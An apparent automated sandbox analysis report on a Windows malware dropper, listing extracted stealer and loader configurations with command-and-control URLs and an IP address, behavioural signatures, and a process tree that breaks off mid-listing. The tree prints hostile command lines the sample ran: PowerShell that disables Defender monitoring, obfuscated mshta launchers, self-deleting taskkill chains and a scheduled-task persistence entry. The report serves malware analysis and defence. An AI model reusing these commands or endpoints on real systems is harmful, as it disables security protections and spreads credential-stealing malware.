Analysis
max time kernel: 26s
max time network: 155s
platform: windows7_x64
resource: win7-en-20211104
submitted: 21/11/2021, 13:56

Static task: static1
Behavioral task: behavioral1
  Sample: b0d129a1b07f3501b7737ae293cbba00.exe
  Resource: win7-en-20211104
Behavioral task: behavioral2
  Sample: b0d129a1b07f3501b7737ae293cbba00.exe
  Resource: win10-en-20211104

General
Target: b0d129a1b07f3501b7737ae293cbba00.exe
Size: 10.5MB
MD5: b0d129a1b07f3501b7737ae293cbba00
SHA1: fc48fab64bcbe7a62ad99f1899703ade98f07804
SHA256: 9ddc809e6e1d32f3c3b1fc1e5382fad699e6336a270bb91fef2a4c0e13f39d14
SHA512: 2deb70fb4f62bcbf3ecbd3a6205f4fd3dae51820be5ab973fc4367b90bef022c4cf5097e506c6c11d39193b8526756412a4f336b2303d305d15da6acc8f9b403

Malware Config
Extracted: socelars
  http://www.gianninidesign.com/
Extracted: metasploit
  windows/single_exec
Extracted: redline
  user2121
  135.181.129.119:4805
Extracted: vidar
  48.5
  933
  https://koyu.space/@tttaj
  profile_id: 933
Extracted: smokeloader
  2020
  http://membro.at/upload/
  http://jeevanpunetha.com/upload/
  http://misipu.cn/upload/
  http://zavodooo.ru/upload/
  http://targiko.ru/upload/
  http://vues3d.com/upload/

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2676 | 2896 | rundll32.exe | 78
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3748 | 2896 | rundll32.exe | 78

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 6 IoCs
resource | yara_rule
behavioral1/memory/2328-231-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2328-230-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2328-232-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2328-233-0x0000000000418F06-mapping.dmp | family_redline
behavioral1/memory/2328-235-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral1/memory/2456-245-0x0000000000418F02-mapping.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 3 IoCs
resource | yara_rule
behavioral1/files/0x0006000000012293-117.dat | family_socelars
behavioral1/files/0x0006000000012293-138.dat | family_socelars
behavioral1/files/0x0006000000012293-151.dat | family_socelars

Vidar Stealer 2 IoCs
resource | yara_rule
behavioral1/memory/2080-298-0x0000000001EE0000-0x0000000001FB5000-memory.dmp | family_vidar
behavioral1/memory/2080-300-0x0000000000400000-0x00000000004D8000-memory.dmp | family_vidar

YARA rule match: aspack_v212_v242 6 IoCs
resource | yara_rule
behavioral1/files/0x000700000001222c-63.dat | aspack_v212_v242
behavioral1/files/0x000700000001222c-64.dat | aspack_v212_v242
behavioral1/files/0x0007000000012224-65.dat | aspack_v212_v242
behavioral1/files/0x0007000000012224-66.dat | aspack_v212_v242
behavioral1/files/0x000600000001224f-70.dat | aspack_v212_v242
behavioral1/files/0x000600000001224f-69.dat | aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 21 IoCs
pid | Process
388 | setup_install.exe
1676 | Wed123d89a91c256e57.exe
1180 | Wed12640230114af0.exe
1072 | Wed12f0ec01aa0d.exe
1556 | Wed126a3d2b0eb7.exe
860 | Wed12d2139ce650c689.exe
1680 | Wed129e9e1f612b5.exe
1984 | Wed1292e7cced8ba.exe
1396 | Wed12f0ec01aa0d.exe
1612 | Wed12f7252371e9b59.exe
1460 | Wed12640230114af0.exe
432 | Wed1245c5fe22f.exe
628 | Wed12e5a6a551c39b62a.exe
2020 | Wed12bf97133ddde4842.exe
1328 | Wed12581881318b9e75.exe
2336 | Wed12d2139ce650c689.exe
2328 | Wed12e5a6a551c39b62a.exe
2456 | Wed12d2139ce650c689.exe
2676 | rundll32.exe
2704 | LzmwAqmV.exe
2728 | Wed12f81f1ede1e.tmp

Loads dropped DLL 64 IoCs

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
10 | ip-api.com
47 | ipinfo.io
48 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 1072 set thread context of 1396 | 1072 | Wed12f0ec01aa0d.exe | 50
PID 628 set thread context of 2328 | 628 | Wed12e5a6a551c39b62a.exe | 66
PID 860 set thread context of 2456 | 860 | Wed12d2139ce650c689.exe | 68

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 3 IoCs
pid | pid_target | Process | procid_target
2124 | 432 | WerFault.exe | 56
1616 | 2080 | WerFault.exe | 80
3052 | 1280 | WerFault.exe | 105

Kills process with taskkill 5 IoCs
pid | Process
2656 | taskkill.exe
2964 | taskkill.exe
2388 | taskkill.exe
2588 | taskkill.exe
2568 | taskkill.exe

Modifies system certificate store 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | Wed126a3d2b0eb7.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = <certificate blob omitted> | Wed126a3d2b0eb7.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 11 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs
pid | Process
1716 | powershell.exe
976 | powershell.exe

Suspicious use of AdjustPrivilegeToken 39 IoCs
description | pid | Process
Token: SeCreateTokenPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeAssignPrimaryTokenPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeLockMemoryPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeIncreaseQuotaPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeMachineAccountPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeTcbPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeSecurityPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeTakeOwnershipPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeLoadDriverPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeSystemProfilePrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeSystemtimePrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeProfSingleProcessPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeIncBasePriorityPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeCreatePagefilePrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeCreatePermanentPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeBackupPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeRestorePrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeShutdownPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeDebugPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeAuditPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeSystemEnvironmentPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeChangeNotifyPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeRemoteShutdownPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeUndockPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeSyncAgentPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeEnableDelegationPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeManageVolumePrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeImpersonatePrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: SeCreateGlobalPrivilege | 1556 | Wed126a3d2b0eb7.exe
Token: 31 | 1556 | Wed126a3d2b0eb7.exe
Token: 32 | 1556 | Wed126a3d2b0eb7.exe
Token: 33 | 1556 | Wed126a3d2b0eb7.exe
Token: 34 | 1556 | Wed126a3d2b0eb7.exe
Token: 35 | 1556 | Wed126a3d2b0eb7.exe
Token: SeDebugPrivilege | 1612 | Wed12f7252371e9b59.exe
Token: SeDebugPrivilege | 1984 | Wed1292e7cced8ba.exe
Token: SeDebugPrivilege | 1716 | powershell.exe
Token: SeDebugPrivilege | 976 | powershell.exe
Token: SeDebugPrivilege | 2568 | cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes

C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"
  PID: 560
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\setup_install.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\setup_install.exe"
    PID: 388
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      PID: 1512
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        PID: 1716
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      PID: 1280
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        PID: 976
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12f0ec01aa0d.exe /mixtwo
      PID: 956
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f0ec01aa0d.exe (depth 4)
        Command line: Wed12f0ec01aa0d.exe /mixtwo
        PID: 1072
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f0ec01aa0d.exe (depth 5)
          Command line: Wed12f0ec01aa0d.exe /mixtwo
          PID: 1396
          - Executes dropped EXE
          - Loads dropped DLL
          C:\Windows\SysWOW64\cmd.exe (depth 6)
            Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "Wed12f0ec01aa0d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f0ec01aa0d.exe" & exit
            PID: 2520
            C:\Windows\SysWOW64\taskkill.exe (depth 7)
              Command line: taskkill /im "Wed12f0ec01aa0d.exe" /f
              PID: 2568
              - Kills process with taskkill
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed123d89a91c256e57.exe
      PID: 1008
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed123d89a91c256e57.exe (depth 4)
        Command line: Wed123d89a91c256e57.exe
        PID: 1676
        - Executes dropped EXE
        - Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12f81f1ede1e.exe
      PID: 984
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe (depth 4)
        Command line: Wed12f81f1ede1e.exe
        PID: 2676
        C:\Users\Admin\AppData\Local\Temp\is-AH9AK.tmp\Wed12f81f1ede1e.tmp (depth 5)
          Command line: "C:\Users\Admin\AppData\Local\Temp\is-AH9AK.tmp\Wed12f81f1ede1e.tmp" /SL5="$101AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe"
          PID: 2728
          - Executes dropped EXE
          C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe" /SILENT
            PID: 2820
            C:\Users\Admin\AppData\Local\Temp\is-FNB45.tmp\Wed12f81f1ede1e.tmp (depth 7)
              Command line: "C:\Users\Admin\AppData\Local\Temp\is-FNB45.tmp\Wed12f81f1ede1e.tmp" /SL5="$201AA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f81f1ede1e.exe" /SILENT
              PID: 2860
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12d2139ce650c689.exe
      PID: 1792
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe (depth 4)
        Command line: Wed12d2139ce650c689.exe
        PID: 860
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe (depth 5)
          Command line: C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe
          PID: 2336
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe (depth 5)
          Command line: C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12d2139ce650c689.exe
          PID: 2456
          - Executes dropped EXE
          - Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed126a3d2b0eb7.exe
      PID: 2032
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed126a3d2b0eb7.exe (depth 4)
        Command line: Wed126a3d2b0eb7.exe
        PID: 1556
        - Executes dropped EXE
        - Loads dropped DLL
        - Modifies system certificate store
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\SysWOW64\cmd.exe (depth 5)
          Command line: cmd.exe /c taskkill /f /im chrome.exe
          PID: 2148
          C:\Windows\SysWOW64\taskkill.exe (depth 6)
            Command line: taskkill /f /im chrome.exe
            PID: 2656
            - Kills process with taskkill
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed124bd92a370.exe
      PID: 1696
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed129e9e1f612b5.exe
      PID: 948
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed129e9e1f612b5.exe (depth 4)
        Command line: Wed129e9e1f612b5.exe
        PID: 1680
        - Executes dropped EXE
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12581881318b9e75.exe
      PID: 568
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe (depth 4)
        Command line: Wed12581881318b9e75.exe
        PID: 1328
        - Executes dropped EXE
        - Loads dropped DLL
        C:\Windows\SysWOW64\mshta.exe (depth 5)
          Command line: "C:\Windows\System32\mshta.exe" vBSCRIPt: cLoSE(CreAteOBJEcT( "WScRIpt.SHelL" ).rUN ("C:\Windows\system32\cmd.exe /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe"" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF """" == """" for %C IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe"" ) do taskkill -iM ""%~NxC"" /F" ,0 , tRue ) )
          PID: 2156
          C:\Windows\SysWOW64\cmd.exe (depth 6)
            Command line: "C:\Windows\system32\cmd.exe" /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe" >7xQFL7QGisA~.exE && stArT 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS & iF "" =="" for %C IN ( "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12581881318b9e75.exe" ) do taskkill -iM "%~NxC" /F
            PID: 2624
            C:\Users\Admin\AppData\Local\Temp\7xQFL7QGisA~.exE (depth 7)
              Command line: 7xQfL7QGiSA~.ExE /pAA1Exp5mOw9JMS
              PID: 2844
            C:\Windows\SysWOW64\taskkill.exe (depth 7)
              Command line: taskkill -iM "Wed12581881318b9e75.exe" /F
              PID: 2964
              - Kills process with taskkill
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed1292e7cced8ba.exe
      PID: 1644
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed1292e7cced8ba.exe (depth 4)
        Command line: Wed1292e7cced8ba.exe
        PID: 1984
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
          PID: 2704
          - Executes dropped EXE
          C:\Users\Admin\AppData\Local\Temp\chrome.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
            PID: 2912
          C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"
            PID: 2956
            C:\Users\Admin\AppData\Roaming\7567955.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\7567955.exe"
              PID: 3876
            C:\Users\Admin\AppData\Roaming\1082526.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\1082526.exe"
              PID: 3980
              C:\Users\Admin\AppData\Roaming\25651493\2565075025650750.exe (depth 8)
                Command line: "C:\Users\Admin\AppData\Roaming\25651493\2565075025650750.exe"
                PID: 4076
            C:\Users\Admin\AppData\Roaming\7342649.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\7342649.exe"
              PID: 1920
            C:\Users\Admin\AppData\Roaming\2311564.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\2311564.exe"
              PID: 3404
            C:\Users\Admin\AppData\Roaming\3959708.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\3959708.exe"
              PID: 2744
            C:\Users\Admin\AppData\Roaming\5782441.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\5782441.exe"
              PID: 2708
            C:\Users\Admin\AppData\Roaming\6857714.exe (depth 7)
              Command line: "C:\Users\Admin\AppData\Roaming\6857714.exe"
              PID: 1340
          C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
            PID: 2080
            C:\Windows\SysWOW64\WerFault.exe (depth 7)
              Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 980
              PID: 1616
              - Program crash
          C:\Users\Admin\AppData\Local\Temp\inst1.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
            PID: 2000
          C:\Users\Admin\AppData\Local\Temp\chrome update.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
            PID: 2216
          C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
            PID: 2356
            C:\Windows\SysWOW64\mshta.exe (depth 7)
              Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
              PID: 2564
              C:\Windows\SysWOW64\cmd.exe (depth 8)
                Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                PID: 2568
                - Suspicious use of AdjustPrivilegeToken
                C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe (depth 9)
                  Command line: ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                  PID: 1704
                  C:\Windows\SysWOW64\mshta.exe (depth 10)
                    Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
                    PID: 1692
                    C:\Windows\SysWOW64\cmd.exe (depth 11)
                      Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                      PID: 3704
                C:\Windows\SysWOW64\taskkill.exe (depth 9)
                  Command line: taskkill -f -iM "search_hyperfs_206.exe"
                  PID: 2588
                  - Kills process with taskkill
          C:\Users\Admin\AppData\Local\Temp\setup.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
            PID: 2492
            C:\Windows\SysWOW64\cmd.exe (depth 7)
              Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
              PID: 1568
              C:\Windows\SysWOW64\taskkill.exe (depth 8)
                Command line: taskkill /im "setup.exe" /f
                PID: 2388
                - Kills process with taskkill
          C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"
            PID: 2232
          C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
            PID: 3160
          C:\Users\Admin\AppData\Local\Temp\chrome1.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
            PID: 3284
          C:\Users\Admin\AppData\Local\Temp\chrome2.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
            PID: 3316
          C:\Users\Admin\AppData\Local\Temp\chrome3.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
            PID: 3484
          C:\Users\Admin\AppData\Local\Temp\Chrome5.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
            PID: 3576
            C:\Windows\System32\conhost.exe (depth 7)
              Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
              PID: 3552
              C:\Windows\System32\cmd.exe (depth 8)
                Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                PID: 4064
              C:\Windows\System32\cmd.exe (depth 8)
                Command line: "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                PID: 3740
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12640230114af0.exe
      PID: 1740
      - Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12f7252371e9b59.exe
      PID: 1488
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12f7252371e9b59.exe (depth 4)
        Command line: Wed12f7252371e9b59.exe
        PID: 1612
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Roaming\5425358.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\5425358.exe"
          PID: 1124
        C:\Users\Admin\AppData\Roaming\2238038.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\2238038.exe"
          PID: 2604
        C:\Users\Admin\AppData\Roaming\1500350.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\1500350.exe"
          PID: 2700
        C:\Users\Admin\AppData\Roaming\7616480.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\7616480.exe"
          PID: 1736
        C:\Users\Admin\AppData\Roaming\3488109.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\3488109.exe"
          PID: 1988
        C:\Users\Admin\AppData\Roaming\5213135.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\5213135.exe"
          PID: 1588
          C:\Users\Admin\AppData\Roaming\832877.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Roaming\832877.exe"
            PID: 3812
            C:\Windows\SysWOW64\mshta.exe (depth 7)
              Command line: "C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\832877.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\832877.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )
              PID: 3860
              C:\Windows\SysWOW64\cmd.exe (depth 8)
                Command line: "C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\832877.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\832877.exe") do taskkill /im "%~nXT" -F
                PID: 2172
          C:\Users\Admin\AppData\Roaming\2375364.exe (depth 6)
            Command line: "C:\Users\Admin\AppData\Roaming\2375364.exe"
            PID: 4036
        C:\Users\Admin\AppData\Roaming\8909318.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\8909318.exe"
          PID: 560
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed12e5a6a551c39b62a.exe
      PID: 1972
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12e5a6a551c39b62a.exe (depth 4)
        Command line: Wed12e5a6a551c39b62a.exe
        PID: 628
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12e5a6a551c39b62a.exe (depth 5)
          Command line: C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12e5a6a551c39b62a.exe
          PID: 2328
          - Executes dropped EXE
          - Loads dropped DLL
    C:\Windows\SysWOW64\cmd.exe (depth 3)
      Command line: C:\Windows\system32\cmd.exe /c Wed1245c5fe22f.exe
      PID: 1976
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed1245c5fe22f.exe (depth 4)
        Command line: Wed1245c5fe22f.exe
        PID: 432
        - Executes dropped EXE
        - Loads dropped DLL
        C:\Users\Admin\Pictures\Adobe Films\lUk26qyVjO9UoJCTiusz7f4A.exe (depth 5)
          Command line: "C:\Users\Admin\Pictures\Adobe Films\lUk26qyVjO9UoJCTiusz7f4A.exe"
          PID: 2920
        C:\Windows\SysWOW64\WerFault.exe (depth 5)
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1488
          PID: 2124
          - Program crash
    C:\Windows\SysWOW64\cmd.exe (depth 3)
